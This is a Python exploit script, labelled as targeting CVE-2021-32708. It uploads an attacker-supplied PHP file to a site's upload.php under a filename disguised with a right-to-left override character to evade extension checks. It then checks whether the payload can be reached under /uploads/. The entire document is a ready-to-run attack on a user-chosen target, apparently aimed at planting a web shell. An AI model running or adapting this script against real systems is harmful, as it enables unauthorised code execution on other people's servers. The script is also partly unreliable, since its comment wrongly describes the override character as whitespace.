import requests

def exploit_cve_2021_32708(target_url, local_file):
    # Add Unicode whitespace to bypass filename checks
    malicious_filename = "exploit\u202Ephp.txt"

    files = {'file': (malicious_filename, open(local_file, 'rb'))}

    try:
        response = requests.post(f"{target_url}/upload.php", files=files)
        if response.status_code == 200:
            print("[+] File uploaded successfully.")

            # Check if the malicious file is accessible
            exploit_url = f"{target_url}/uploads/{malicious_filename}"
            check_response = requests.get(exploit_url)

            if check_response.status_code == 200:
                print(f"[!] Exploit triggered! Access your payload at: {exploit_url}")
            else:
                print("[-] File upload successful but payload is not accessible.")
        else:
            print("[-] Failed to upload the file.")
    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    url = input("Enter the target URL (e.g., http://example.com): ")
    file_path = input("Enter the path to the local PHP file: ")
    exploit_cve_2021_32708(url, file_path)